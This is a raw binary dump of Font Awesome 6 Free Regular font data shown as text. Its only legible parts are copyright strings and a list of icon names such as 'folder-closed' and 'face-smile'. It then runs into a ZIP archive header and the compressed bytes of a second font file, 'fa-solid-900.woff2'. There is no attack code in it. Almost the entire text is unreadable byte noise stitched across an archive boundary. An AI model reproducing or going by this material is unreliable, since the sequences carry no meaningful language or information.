&@0Wz767167&'&'67167&'&'0#"#"'011'67167&'&'&'&'&7676717167676767&'&'&'&'1$%66%$$%66%$"""$00==00$#  #$00==00$#  #1(( ((11(( ((16%$$%66%$$%6P""#""!## #""""""# ##!!8Hft67167'&76676767&'&'&'&'165&'&'0##&'&'&'&'&767671'45&'&'3!*+3=00$#  i  p'.#16%$6 ((1L6"R *6H=00$# "& ((1.&8%86$$c"!##  R  X$$%6 ** ! @!"""# $.$,!-%$7 "',16;BGNS35673!&'&'6767356735#35#335#335#7#35#3675+35+357#35((hPPPP``PPPPPP@``P@``((@((880@@@@@@h888(88(888$?1167673676767&'&'&'"/6?'&'&'6767H9:""3  .##+2G:9""""9:G(&$  ;;XX;;;;X//:I5 //:://   D----DD--)#'&+!6767&'&'!&'673230wv?`-@;@+%!&'&'6767323#5&'#'&+767!=` v10?vG  @- ;(3!!&'&'67673#&'#&'673!&'67!`h`hH`:r1"'&'&76767&'676736767&'&'6?%1&'&'#&'&'6732?&'&/76767&'&'74'1X;;;;X! )  -;;X+D----DD-- T88-  ) !>12$$, )(?21KK12  .@K12%$66$%%$6  11I@.  ,  3##8 '&?'&76?617% o D  vV]O n ; U x2 7i|6'1&'&'&'01&01032760101767676'0105&7'1'0101&"'&7656'01&76767627276#"#&767676 !'66<:  !'66<: * /0**%  /$ ! #$#   *),/  :<66'  :<66' %**0/  &)*0$    #$# ,)* @ +4=7#&'67;#&'6731!&'&'6767!!!5&'!!67500pp@@ p0@0 *7@%67&'!!6767&'&'!&'567!5&#!"567!67&'0@h8@``V(3?O|%4'674'674536767&'&'#&'#"36767'#&'6737#"'6=37#545&50301354?6732#"'&=&'&'&'&'673#@  8*2 ()=h(00 0 0x  2  '!88( ) ) 8$l;('hP P(l8 T  44 / "\(3?P3676754/&'&+#37#&'673'+&'67350921#&'673654'&'45654'676=&'#"'&=476;&'673#h=)( 2*8  00 00   2  !|88 '(;l$ 7 ) ) P P(  44  T 8l! (3?O|"&'"&'"#5&'&';67675&'&'67&'5'67&+5'67#"##05015#"/&'5476;2+3276732723277&'567x ) ) 7 $l;('hP P(l8 T  44 / "\  8*2 ()=h(00 0 0x  2  '!88 (3?P%5&'&'#"67675236736736767'67&'5327&'5#094122;&'5%&#""#&#"&'&+32+"'&=6?6;&'567'(;l$8 ) ) P P(  44  T 8l!h=)( 2*8  00 00   2 !|88&C'&+3676754'#&'673;#&'6735#367675#>  ' /``/y>  0 0 ',A716767&'&'7'&+!676754'%3#5!&'6733675T @ϐNT 1PP@hdN"1!&'&'6767!!!67&'@@@0@$267167!!&'&'332?5&'!!675#"/0$$@ Tuu&S\%'&+3676754'#&'673;&'1&+&'&#"#35#&'673;676;'&'67>  ' 0))`` = >>  0 `   0  p-DV36?675#110130105676767&'&'1#&'&'&'6767'167676767&'p > PN01+  +21K` ^ !!<7$%p"     ''23GD0/EJ21%00'&$$60%" $6@!&'&?675676754763211!&=&'&'##"'&538#$+ p +$#8  (,(0(,H )):!F7  7F!:))  @,!J==J!,>Um6733##&'5#&'56735713!&'&'676735676733675#&'6735#&'6735&'#3#3#3#13567673&'#(pXXHX8888XP8888XX@  @`` h0((0hP@  @x.;75#&'6735673#&/67167!!&'&'3!67&'!@@@@@0@h@@@@@@,%11&'&'&'676767%16767&'&'"":9HH9:"""":9HH9:""X;;;;XX;;;;XH9:"""":9HH9:"""":9H;;XX;;;;XX;;+=Xj%671676&'&'&76'1#"'&'676323671632#"'&'11&'&'&'676767%16767&'&'  (( 0    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X`      0H9:"""":9HH9:"""":9H;;XX;;;;XX;;+=Xj7&767632'&'&''171#"'&'676323671632#"'&'11&'&'&'676767%16767&'&'#",,"#  @    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X1 %%       0H9:"""":9HH9:"""":9H;;XX;;;;XX;;#.I[7671632#"'&'31#"'&'67632#&'673711&'&'&'67676767167&'&'       ("":9HH9:"""":9HH9:""X;;;;XX;;;;X    xHH9:"""":9HH9:"""":9H;;XX;;;;XX;; @!.;HUbo|!!6767&'&'!&'67!%#3675&'3675&'#;675&'#;675&'#7#3675&'#3675&'3675&'#;675&'#;675&'#7#3675&'#3675&'@@|    8    P    P    h        8    P    P    h    <    0            0    P    0            0    X"+35673!&'&'67673567!67!((h@((@((+=6'&=47111&'&'&'676767%16767&'&' D"":9HH9:"""":9HH9:""X;;;;XX;;;;X-X X mH9:"""":9HH9:"""":9H;;XX;;;;XX;; -%#&'673%67167!!&'&'3!67&'!8@0@@@/<7#1"/&5476327632'67167!!&'&'3!67&'! @ ,l @0@l@ ,l @@@"E'&#&675676;2?654'#!&'6;67&'#"!67675&'9d>-,,d 881_,-@WX,_ //$?Q%'&?6?61'"1327654'11&'&'&'676767%16767&'&'3 8  8 4   "":9HH9:"""":9HH9:""X;;;;XX;;;;X{8  8  e   H9:"""":9HH9:"""":9H;;XX;;;;XX;;$1#32?6'&'7!!6767&'&'!&'67!@ ` ` @@@  hh  @@$1&#"3676/7!!6767&'&'!&'67! `  _@@h    h@@$1&?654/7!!6767&'&'!&'67!    hh@@2  ` `n@@'6716732!&'&'#"'&=#!67ZPP Z P&1<'&+!67674'!&'673;'367&'##367&'mJ OcJ5P H#";276=4'&'&'1&'#654'&'0127676767633#"/&#36767674'674'67`@ @ d!"   4( % $-84  $'"     ##${754'&+";765%65&'65&'&'&'#2?6;#'&'&'&#67654'36767&' @ @ b48-$ % (4      !d   ;##     0 &#2CUg%'76'&/&'&'&?3276?676''/7'?7'16767&'&'&'1&'676700 SEES 00 SEE S 0dSSd::dSSd::0 // 0{EES // SEES //Sd::dTRd::dRT /0 /.  (:%"##&'&'67676'&'&'&#"27676'&#&'1&'6767#I12* ?3232?4-- K12 4!++D D21K0()32??23'421K:,-5AL99 !1!!6767&'&'!&'67!&7675&'@@~ hh   @@ ` ` ,>767167&'&'!11&'&'&'676767%16767&'&'))))`"":9HH9:"""":9HH9:""X;;;;XX;;;;X))))H9:"""":9HH9:"""":9H;;XX;;;;XX;; &3Ia673#&'57#&'5673673#&'57#&'5673%67167!!&'&'3356767367&'!X000000000P  PX00000000@  @/CK\e{6753!&'&'53!"'1&=##5676732#5#1#&'5673&'#36?673#&'53675&'#7#3#&'5673@00@ 0Z0P0     0  0 PZ% @ 80( @ p@` 0&C'&+!67674'!&'673;'&''&6?6?6'&'mJ Ox 00 cJ5P FN HH NF&C'&+!67674'!&'673;''&32?3276/76'&mJ Oj%% --  &%  -- cJ5P 00 99 00 99 &9E'&+!67674'!&'673;'#6753676'&'&'#532#mJ OH,",,  cJ5P  #h8 &<N'&+!67674'!&'673;'"'&#";276/&#'271654'&#"3mJ Ox( /KW  cJ5P <Fp   */4@K'&+!67674'!&'673353;#35#35#676/#&'673mJ0@0 O@@@@@  cJ5P ` @ @uu&9X'&+!67674'!&'673;'#37675&'&01327076767&'&'&mJ O$,  ,$?       cJ5P $ 8 %  " &H'&+!67674'!&'673;'4'1&+";276=76=4'&5mJ O_ ` ` ,,cJ5P  ` f&7H7&3276/76'7'&+!67674'!&'673;'32?6/&0 0 "" J Oq "" 0 0 00""J5P ""00 (3?KVh%/&''&?&'67'&766776'#"'67'7&'671'6327&'1&547'?16767&'&' D__D  99  D__D  99 P6KK6P,P P,K6PP6KS P,,PS     99  D__D  99  D__D \ P,,PSK6PP6K,P P,P6KK6Pa    "&&32?327676''%57'7 0  oc @ h#//0@rG)  s+1J 7737'711676767&'&'&''#"/&'7'677`NONG9:"""":9HG:9""""9:HhhU!*SS*!U[[99"":9HH9:"""":9GG::#"cc&/"b/ = +I9   )):!F7 E  r,2!,U %;20 7F,Z11676767&'&'&'&'1&'67670901276'&'010101676'&#01"'&54763H9:"""":9HH9:"""":9HX;;;;XX;;;;X!%54&%%&45%!  "":9HH9:"""":9HH9:""0;;XX;;;;XX;;  %%'33'%%  @!Bc!!6767&'&'!&'67!%76'&#"3276'&#"'&547632376'&#"3276'&#"'&547632@@&'&'&'&'@@((((  -R_4716;2+"'&=67167532+"'&=3'&'6767!67&'!&'&'67!67&'!   @   X   0F  ` ` `        6GUbo2136763"'&'##&'&'47675&'&56767167&'"#0101%"#6745&'1#3675&'45&'2367%521367&'%&'536763"'&'##&'&'4767533675&'#7&'"#67452367&'2367451&'1@      @  ;   K    E   0  .y    M    j  jP     ( j  j      j  %%  j       (2!36?675&'&'&'67!##&'%5673(8@X  W 88'u ?X W 82?36753#&'&'567673#671673#&'&'53675&'#@0@@`@@@0'2;67!#3!&'67356?'&'5#&'13&/"1675#3P*RR*,QQ,dRQ>.QR,??,RQ.>RR"" k&'#"&+"&'#276="'"/&'54?6756732747673676;0132276=675&'&'y# "! # 8        /|2)O e  O ,      l+A.i"&'&#"&'&#e;67675&'&'1#&/&5476323275676?676756767567 )) "R'',!Q76()<"E0P p   z"W 67Q=)(2V      i0u3676754/&'&+'&#"#3237'&'45454'&'56767&'"1"#&'6?27654/&'47672367&/76;#b=)( /*   Y !!"!   A / )c '(;l$ 7 / # #0     4 U 8l'P%&'54/&+;+"32&'5'#&'&'&76;2?4'&+"'&767673 v  ` N =$` #2wt\\   : /##)  S232?6322?0147672#&/&5476323674/&54763636745'&567635"1&#3676?65&'&"#&'&#"'&'&#/     0 ""-1?/L 3 $   + K=R1>//0      h ,+G 1$"{ j  0$" RG8%%= ( 6 C{7675&'3675&'7&'#"&+5&'&'&"1;2767675&'&'+&/&5676363276=6767673276;3'675&'@ i# "N $m + m4O    @````WXh #2n)h  &   n``` 0;MW"&'"7654'&'"'&';67675&'&'67&'5'&'0101"767672'&'#"/&=6?2723232767636727277&'567  !+2 .-:OK12\H  =17O)!. i : %  ##2 E (h P#$#22Jl4888s$ P   "2 88,FR11676767&'&'&'&'1&'6767&'1&'#67533276/67#532#H9:"""":9HH9:"""":9HX;;;;XX;;;;X`"X<&##P@@ "":9HH9:"""":9HH9:""0;;XX;;;;XX;;"HR K, @  ;D73#&'5#&'673567'35673!&'&'67673567!67!0000H((h@0000((@(( -67&'673#35673!&'&'67673567!!67((@``(((@(;D%/'&?'&767635673!&'&'67673567!!67./0//0/.((@x/../0//0H(((@(1:7/&767635673!&'&'67673567!!67@0_pX((@(@/_p(((@(@#(/'&56?67617'76   xx80xx @=< P@>=-.00-.+!;?32767&'&'#5#&'67!`}PT^<<  0B675&'3675&/11676767&'&'&'&'1&'6767p8H9:"""":9HH9:"""":9HX;;;;XX;;;;X "":9HH9:"""":9HH9:""0;;XX;;;;XX;; '9#3675&/11676767&'&'&'&'1&'6767HHH9:"""":9HH9:"""":9HX;;;;XX;;;;X "":9HH9:"""":9HH9:""0;;XX;;;;XX;;H#&'&''&=676727675"301&'&'&'67676763276767 --  *--*--,!!--        u~&'1&'&&3276767632?/#//#5#36733236776776?6'&/76'&'&54?633'&'67!&'67/##)  . : |!  ZJ`@ =M  y 6 V .7 A6 A   ; d$ QE  $b6 X   *8Y&'1&'1&'&'&'&'1!676754'!&'532?5#"/5676767676767  ;;   ((   ;  ;   +  + qq ++   )2;P]%#367&'&/67167&'&'#3675&'#3675&'#3675&/!!6767&'&'!&'67!@"" p  "" @`@`@`@@@+6KX767167&'&'%#367&'#367&'&'7#367&'7!!6767&'&'!&'67!``@""``0@@8""x@@#>Lc16767&'&'"'1&547632#511676767&'&'&'&'676;27&'1&+"&'6767%%%%  H9:"""":9HH9:"""":9HG5 H6G! 'H' .;;XX;;.P%%%%   "":9HH9:"""":9HH9:""0))K  7MX;;;;XM8-?N!!6767&'&'!&'673;276=3'67167&'&'#367&'&'@@ @ @ @""@  ""@ 1DO%367&'#'67167&'&'!!6767&'&'#&'&'##&'!'367&'#p``0@"@" ``h @""$676723!!&'&'45671!675! (` @  67!!&'0"8A#"#567673#53276=4'&#1!&'&'6767!!675! 0""" p """0  P~%//#"/&'5'&?5'&?'&?'&767''&?'&76'&765'&7656776?676/76 ! !I9 9I! !NIIN! !I99I ! !NIIN   N*T9&&9T*N  +)  N*T9&&9T*N    )*  @IW7&'5673&'5673&'5673##&'&'#&'673767313'&+"1;2765!PP$F""F%^^H  0w7""077 0@.@U!!67675&'&'#'&#"'&#"#&'567!%"1327654'&#!&'&'567!`m ?I`  3""P^a   ""3&?#&'&'#!6767&'&/&'67!&'67336754'3@22@p@4F%#'&'#"#32?6'&/11676767&'&'&'&'1&'6767X8 8 Y W XH9:"""":9HH9:"""":9HX;;;;XX;;;;XX X  ``  "":9HH9:"""":9HH9:""0;;XX;;;;XX;;2D%#5&'&76753675&/11676767&'&'&'&'1&'6767hX  ``  XhH9:"""":9HH9:"""":9HX;;;;XX;;;;X8 Y W 8"":9HH9:"""":9HH9:""0;;XX;;;;XX;;2D&7?654/11676767&'&'&'&'1&'6767  WX  ``H9:"""":9HH9:"""":9HX;;;;XX;;;;X* 88 Y W"":9HH9:"""":9HH9:""0;;XX;;;;XX;;2D&#"336753676/11676767&'&'&'&'1&'6767 X 88 XH9:"""":9HH9:"""":9HX;;;;XX;;;;X8`  XX  `"":9HH9:"""":9HH9:""0;;XX;;;;XX;;!%'&#!"32?6/#7'3'#7'!h g   }?MNN~KA~V c__RccR__@&<Q%1&'&'6767'#367&'#5&'#%67167!!&'&'!67675&'&'! 00  00 0@0`0  00  0 @P`0/<676/'&?'&71'67167!!&'&'3!67&'!/0..0///0///0..0/O@@@ X!3!67&'%135'&'&'67676732?356767&'&'&'674'&+"( 0!   B 6 "0 @  ' C  ,//"! B 6+   C '&/0+* *+0/&@!3!674'J'&'#5367&'#5&'#3#3'4547!3765 O 8  A3GPG2B  8!!8  BKX701356?675#"/&'54?'&567335&'&'#767&'!3!67&',0"& !  iC+,09:Wi $ Q (  ( ;   p ,,CW:: p  > >P!!674'&#'336'533&'&=367&'#674'&'&'&'#"71&'&'6767( 5@5% +2""% i 9899"5 ""26" ^m67167&'&'4/&#""'&'&5&'##"'&'&'#&'&#"3'3017676727376545!3!674'&#   '    '   l5] /.) ]5lW P PU     &##    MZ!3!67&'!"367654545'533533533&'&5454576=4'&#"1354'&#h Q %10@0@0@01%  @    !",+""# )u0000u) ###*,"!  @@  !!!!0`0`#5Zu7"1327654'"1327654'&'"1327654'&#'1167673676767&'&'&'"/6?'&'&'6767  p p  pG:9""3  .##,1G:9""""9:G(&$  ;:XX:;::X        //:I5 /.:://   D----DD--+<Wi%671676&'&'&76'1#"'&'67632&7632'&#"'11&'&'&'676767%16767&'&'  (( 0    J   "":9HH9:"""":9HH9:""X;;;;XX;;;;X`     H9:"""":9HH9:"""":9H;;XX;;;;XX;;-Gbt%'&''&76767'67'&76/#"'&'131#"'&'47'&?6167167167&'&'&'67167&'&'H      `       `  "":9HH9:"""":9HH9:""X;;;;XX;;;;X6              H9:"""":9HH9:"""":9H;;XX;;;;XX;;+E`r767167&'&/676/'&?'&713676/'&?'&7111&'&'&'676767%16767&'&'Y"":9HH9:"""":9HH9:""X;;;;XX;;;;X`yH9:"""":9HH9:"""":9H;;XX;;;;XX;;  %7@Rd%#&'673'67&'#67167&'&'67167&'&'7&'6731&'&'6767'16767&'&'11&'&'&'67676767167&'&'@8""""P    8""""P    "":9HH9:"""":9HH9:""X;;;;XX;;;;Xpp""""0    0""""0    PH9:"""":9HH9:"""":9H;;XX;;;;XX;;(:Ug7'1&767632'&'"171#"'&'676323671632#"'&'11&'&'&'676767%16767&'&'  ##  %,,%    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;XO      0H9:"""":9HH9:"""":9H;;XX;;;;XX;;  %-?Ql~%1#&'&'6767335#35#7#35367&'#'1#"'&'676323671632#"'&'67167167&'&'&'%16767&'&'X( `     `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X 000000000    0H9:"""":9HH9:"""":9H;;XX;;;;XX;;'9Tf%61#"'&'&76327'1#"'&'676323671632#"'&'11&'&'&'676767%16767&'&'^ && ,22,    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X   d    0H9:"""":9HH9:"""":9H;;XX;;;;XX;;'9Tf%61#"'&'&76327'1&'&54767347167&'&511&'&'&'676767%16767&'&'^ && ,22,~   @   "":9HH9:"""":9HH9:""X;;;;XX;;;;X   t@H9:"""":9HH9:"""":9H;;XX;;;;XX;;Gx%61#"'&'&76327'1#4101&'4'&'&'&'"30#1'&56767'13#4101&'4'&'&'&'"30#1'&56767'111&'&'&'676767%16767&'&'^ && ,22,"":9HH9:"""":9HH9:""X;;;;XX;;;;X   O    H9:"""":9HH9:"""":9H;;XX;;;;XX;;Nd&'1&'47014767676#1'&'6767&'327&'&'&'6767671"'1&'&763276#'#4101&'4'&'&'&'"30#1'&'6767'131#4101&'4'&'&'&'"30#1'&56767'1    I7JX;;;;XX;;  "":9HH9:"""":9HN=& ,22, &&@    M ,;;XX;;;;X7-/6H9:"""":9HH9:""(       -D_q%61#"'&'&76327'/&'&767676761376/&767611&'&'&'676767%16767&'&'^ && ,22,oA  g A "":9HH9:"""":9HH9:""X;;;;XX;;;;X   B   B OH9:"""":9HH9:"""":9H;;XX;;;;XX;;+@[m%61#"'&'&76327'1'&5&?'&74767/&54?611&'&'&'676767%16767&'&'^ && ,22,Y$$Y$$ZZw"":9HH9:"""":9HH9:""X;;;;XX;;;;X   q 0++0++0 0[H9:"""":9HH9:"""":9H;;XX;;;;XX;;1Pg}6312"7676716716&"&76711'676767767676'23676716312'&5&76767161'&5/&'&76?2'&?6761671676#"'&5471   ASTK?HH75() >) >ASTK?HH76(x  "#! %$$ 9bc8a       => ))57HH?KTSA7KTSA> ) (68HH>a """  #$&  a89 b   =Sn/'&?'&76?6323/'&?'&76?63261#"'&'&76327%67167167&'&'&'67167&'&'&#!&&""&  && ,22,"":9HH9:"""":9HH9:""X;;;;XX;;;;X%%""%%""   4H9:"""":9HH9:"""":9H;;XX;;;;XX;;8Sv%&'&'676767676711&6767&'&&'&'5'1&'&5476767676721!"9&505&'&'43232'1"'1&'&763276#'#4101&'4'&'&'&'"30#1'&'6767'131#4101&'4'&'&'&'"30#1'&56767'1 !<g7671632#"'&'31#"'&'6763211&'&'&'676767%1&=&'&7632766767&'&'35&'##"'&'#6767       "":9HH9:"""":9HH9:""X;;5  ,22, 5;;Y@     0H9:"""":9HH9:"""":9H;;X>11 4     4 11>X;;% %,Gp4716'&5&?'&71%61/&54?11&'&'&'676767%1&=&'&766766767&'&'5&'##"'&'#6767tYY$$$$ZZ"":9HH9:"""":9HH9:""X;;5% 11 *  * 11?X;;% %+=X7"'&7632'˿&'#67167&'&'67167&'&'!67167167&'&'&'67167&'&'&=&'&7632761'5&'##"'&'#6767    8""""P    "":9HH9:"""":9HH9:""\5;;XX;;5  ,22,    """"0    H9:"""":9HH9:"""":9H11>X;;;;X>11 4     4 % %'8Se%61#"'&'&76327'1#"'&'67632&7632'&#"'11&'&'&'676767%16767&'&'^ && ,22,    J   "":9HH9:"""":9HH9:""X;;;;XX;;;;X   d   H9:"""":9HH9:"""":9H;;XX;;;;XX;;ew%"'&7925274367674765&'&'"5&'"5#51&547925274367674765&'&'"5&'"5#51&7671'1#"'&'676323671632#"'&'11&'&'&'676767%16767&'&'1    a    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X      J    0H9:"""":9HH9:"""":9H;;XX;;;;XX;;e%"'&7925274367674765&'&'"5&'"5#51&547925274367674765&'&'"5&'"5#51&7671'1#4101&'4'&'&'&'"30#1'&56767'13#4101&'4'&'&'&'"30#1'&56767'111&'&'&'676767%16767&'&'1    W"":9HH9:"""":9HH9:""X;;;;XX;;;;X      E    H9:"""":9HH9:"""":9H;;XX;;;;XX;;-#&'&'&'676767&&'65&'&'27'"'&7925274367674765&'&'"5&'"5#51&547925274367674765&'&'"5&'"5#51&7671'671632#"'&'"'&7632'&#76/&7676Y/5H9:"""":9HH9:"" ;;XX;;;;X,'8          g U  "":9HH9:"""":9H,("X;;;;XX;;      ~     Y %7Rd7&716;2&'&'171#"'&'676323671632#"'&'11&'&'&'676767%16767&'&' "".."" M    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X  **z    @H9:"""":9HH9:"""":9H;;XX;;;;XX;;Ev7&716;2&'&'171#4101&'4'&'&'&'"30#1'&56767'13#4101&'4'&'&'&'"30#1'&56767'111&'&'&'676767%16767&'&' "".."" W"":9HH9:"""":9HH9:""X;;;;XX;;;;X  **U    H9:"""":9HH9:"""":9H;;XX;;;;XX;;)?Zl7&716;2&'&'171'&5&?'&74767/&54?6111&'&'&'676767%16767&'&' "".."" \Y$$Y$$ZZw"":9HH9:"""":9HH9:""X;;;;XX;;;;X  ** 0++0++0 0kH9:"""":9HH9:"""":9H;;XX;;;;XX;;%6Qc7&716;2&'&'171#"'&'67632&7632'&#"'11&'&'&'676767%16767&'&' "".."" M    J   "":9HH9:"""":9HH9:""X;;;;XX;;;;X  **z   )H9:"""":9HH9:"""":9H;;XX;;;;XX;;#>P71#"'&'676323671632#"'&'67167167&'&'&'%16767&'&'    `   "":9HH9:"""":9HH9:""X;;;;XX;;;;X    0H9:"""":9HH9:"""":9H;;XX;;;;XX;; 9Kg7673#&/67167&'&'67167&'#"'&545011767167&'&'67167&'#"'&54501%67167167&'&'&'67167&'&'X""""P    p""""P    "":9HH9:"""":9HH9:""X;;;;XX;;;;XH""""0   0""""0   H9:"""":9HH9:"""":9H;;XX;;;;XX;;!5Pr7"'&7632'&#&7632'&#"'67167&'&'5'67167167&'&'&'67165&'&'56767567       Z    "":9HH9:"""":9HH9:"";;XX;;,44,   Y      @H9:"""":9HH9:"""":9H&',X;;;;X,'&vv!3E`v76#"'&'67671'&'&'671'21#"'&54763"'1&547632#711&'&'&'67676736767&'&'31      /B.      PH9:"""":9HH9:"""":9HP%+X;;;;XX;;2  8 *   @   "":9HH9:"""":9HH9:""@;;XX;;;;XQ8K|%671676&'&'&76'1#4101&'4'&'&'&'"30#1'&56767'13#4101&'4'&'&'&'"30#1'&56767'111&'&'&'676767%16767&'&'  (( &"":9HH9:"""":9HH9:""X;;;;XX;;;;X`  {    H9:"""":9HH9:"""":9H;;XX;;;;XX;;(+/'&?'&76?672'&?'&/z o o DD[i Vv 6% n II n   8x U l#5Pb7671632#"'&'31#"'&'6763267167&'&'%11&'&'&'676767%16767&'&'       @"":9HH9:"""":9HH9:""X;;;;XX;;;;X    `H9:"""":9HH9:"""":9H;;XX;;;;XX;;,A\n767/&#"'&56?1'&5&?'&74767/&54?611&'&'&'676767%16767&'&'11"&&".Y$$Y$$ZZw"":9HH9:"""":9HH9:""X;;;;XX;;;;X##} 0++0++0 0[H9:"""":9HH9:"""":9H;;XX;;;;XX;;,g!F2 , ng 4U 6-  B 6- dc 0 X . & The web's most popular icon set and toolkit.Copyright (c) Font AwesomeFont Awesome 6 Free Regular-6.1.1RegularFont Awesome 6 Freehttps://fontawesome.comFont Awesome 6 Free RegularVersion 769.01171875 (Font Awesome version: 6.1.1)FontAwesome6Free-RegularThe web's most popular icon set and toolkit.Copyright (c) Font AwesomeFont Awesome 6 Free Regular-6.1.1RegularFont Awesome 6 Freehttps://fontawesome.comFont Awesome 6 Free RegularVersion 769.01171875 (Font Awesome version: 6.1.1)FontAwesome6Free-Regular      !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~hashtag0123456789abcdefghijklmnopqrstuvwxyz folder-closedheartstaruserclockrectangle-listflagbookmarkimage pen-to-square circle-xmark circle-checkcircle-questioneye eye-slash calendar-dayscommentfolder folder-open chart-barcomments star-halflemon credit-card hard-drivehand-point-righthand-point-left hand-point-uphand-point-downcopy floppy-disksquareenvelopepaste lightbulbbellhospital square-pluscircle face-smile face-frownface-mehkeyboardcalendar circle-play square-minus square-checkshare-from-squarecompasssquare-caret-downsquare-caret-upsquare-caret-rightfile file-lines thumbs-up thumbs-downsunmoonsquare-caret-left circle-dotbuildingfile-pdf file-word file-excelfile-powerpoint file-image file-zipper file-audio file-video file-code life-ring paper-planefutbol newspaper bell-slash copyrightclosed-captioning object-groupobject-ungroup note-stickyclone hourglasshand-back-fisthand hand-scissors hand-lizard hand-spock hand-pointer hand-peace registered calendar-pluscalendar-minuscalendar-xmarkcalendar-checkmapmessage circle-pause circle-stop font-awesome handshake envelope-open address-book address-card circle-userid-badgeid-cardwindow-maximizewindow-minimizewindow-restore snowflake trash-canimages clipboard circle-down circle-left circle-right circle-upgem money-bill-1rectangle-xmark chess-bishop chess-king chess-knight chess-pawn chess-queen chess-rook square-full comment-dotsface-smile-wink face-angry face-dizzy face-flushedface-frown-open face-grimace face-grinface-grin-wideface-grin-beamface-grin-beam-sweatface-grin-heartsface-grin-squintface-grin-squint-tearsface-grin-starsface-grin-tearsface-grin-tongueface-grin-tongue-squintface-grin-tongue-winkface-grin-wink face-kissface-kiss-beamface-kiss-wink-heart face-laughface-laugh-beamface-laugh-squintface-laugh-winkface-meh-blankface-rolling-eyes face-sad-cry face-sad-tearface-smile-beamstar-half-stroke face-surprise face-tiredPK!2JpZpZassets/fonts/fa-solid-900.woff2nu[wOF2Zp (Z%8$ `(@ʔ(˫,p ВHpaDfOq@UUUUդlG?/~OO´lx}~۹~٥PEW5j(Q kTbيg !j$\rSp^d+3Qyq&tn٥V,*[Hjh= 6gR5xdz\,fk.: w6J/+T"ꆼD(먙,8|rKr{0vJ[>.L״Ru?%iveҎl)Ú(lz_b;zCz|#Xɹ%Ǔ__L4w7NaoiA@hD:FNHs8C:ㄣG8N'F#;%˖Il˶vm؋]{9b'"ڿs{ Izh$F3)c'&5&M͔RXJrK.p3YlźK% _sw d2$p0N 11N"5'ɸ[XKS?Qb◶h_ZQ{RK)?1zAF22q!wzhS@M-q$k [~۟cU3#"qы`zjcgjGx|}3CBL*ޞͦSHv6$Ed3'qx6 tH~vO"Z2l+9|uT ľ66o#+Z|S+܇*Y9 7St1aS|;V%QLtX.{r3>AMcco7g){%ȾAg*vwԈRuϏS~fGEm/,nW*o:&L_eU/̩ʼ/xQ=mk)e9Tە OdNwVcAm3ϯ,\͍b˳5ڪKiN{;[uU2Im0<;﬒O_@+bP/G0O֊w|e\#NC's65:}%ם3u '߾CQ\XY#:_dN5m bSg[]gT//&u wnɵggCN<&t}:K#] };G㩄KV#km vyg/XJ~d,'q oحQtM3ΔoC\[Z^W83{=I}W`qDZҩ j_yQp6߈saY!gŚV]6}f>8uV><àf[LI:T|1_#;)PaAIOT^UUQ}W5@#4A5I5M5KPRk[{Ou@uHuTuBuC7PFI7? e-%ZkdM 6Ʀ*;b씝+vS{eڣzrO9=^ċy /eW^z#oͽw }O>b_|~Oi7?|(?@> u4 :@G8g\^[@HTH >W0ĢXˡ*`Gݱǁ8G8p6J\q cx/uw9w^臡)~G/iT S)*CUTS[@;4FxIsh-CG tmG%7 o  J~RQU_PU!UTWUYTT}NR}5XS\RUvuPW*HŪxeriVQhm$&uۧLۚv [-O\qaSVZe[W} ҬOw;]ndG eN}i,r<2SYql '?-`b/;3.̍2x.[/e 2j9o;a|4M| #$ƿ1MEQQ4-DK@1G,+J->pϊ x!w)|Eډ -{Vg?i/4d:F49C.KrV[1Moێ 2F ARPBCh͠9tNp )3=*Xasl8$3F܎^g3yK!;KנTZ4F8Ii>-566C%B7.=ޓy?iXC~*TU\:SFeqR]XWODVhbn{y߼a^3/͍:Y۬a1 !/Fk^Kq߸j\1.vc1btuv~r8w7 yzz?^UW ʁpHGC8oٗs)}gﲷ^ ^^U^^ݥ=-l,LtOcm<<Q vwwۊ;#ۯş-- č \\uu\۵\ro98s}G==S=C}]Y1aAnmmm 2-bMMM_NP ` TQ/PuT;W=Ua܌S?[cKl: 1>EmV"GhMaԏzQ'jDըB,FiQ,FD"Q8B?I?ҷ5}I2=OOcHWyH tt*L'ұt4IڠZUZZZ91N꠶j&jʪ***"*ʧʣ\ʩJTJJ[C_ow~'~;S>#u^E !.6n:J.,tXh dbO`7ve{ekbK`S6ac6b=Vecf)`!033cnbNfg6fb &a:(-| /ýp7 7Åp:”0, - 1111i-t{Y7N>yr=7c%Vc9Vzko흱s}.N9Ghy](K^Q+QgX,h}{co1-QrT9*Jwp0Q^T>GaDߋ*V=aS6aGh-aRx*JQ@ᕨb=oBu.fY!?'VaA o-xi/`7M G`3` mS-ܭ9{#666 ЇFby¯K7߮lX-{D?[vcƦZm8]6JOtaDǥ}P=')9/D\d8xgكf ((EiPrDePjT1$#&MR4!d쐝/#rRer\!wȽr/ȃ<,c<%O3(/' ??jZJhDjKmvn]{hOtҡ:WR]unMYVݦ5_Q=g"\o׻~}LWu}WP?ҏT? SBVXYXbyjY3ka-vY`m 6Xnsm-V*[mmK5{޵}>sK8k~_~?{!P;4( 0W d (P (d<0TS4`P L*3@`&0)jsWdEXP$"XTE ,)jKZ6(+z>h9!p1t#p)t3p% jh':XA6]}ﰏ .yоW5m!z+ ⫠@| tķ߃F ,dB^!K9 y2G /C(dCl(dցݐy!C:kH  ?HjABR$u CR^S!y($_B+}| y B#$?C y!!z  r?䞇 ; &CSO QHh)H RC!5Hcgf&!OCZ~@~3 B ~! /HK"|FZsƈ6A<)A!m?i Hapi{H{#@:!p8ߓDtb%XH ~F:Sq_A؅t>Iap6tsUFI I"4ut=—*FH7!|Mau-&A =k2<WIϣTo=M}a&нH޴;#s. Oa 8"y,ĥی<.Map*y|C N#OhSJ4 #E!WXyuMuM¶`p<|>/@i^Mi>če ՘e2#erCՙe͞(#207ed0/e#XrxGr!6\,؈rlL6 R(a k%eHihM P.mK v ;Q;.`W!=vK=3'b%C> Q/w@{p8#Bяpi _ ? N9ÉѿpJ8Ncxûq:?gpmڢ82K["Σ*τ.O;Khg*eshruЕi*;qBD*nNO +C=>ȗH|9YϾ|9rn|_6%ߌ~o@۔ 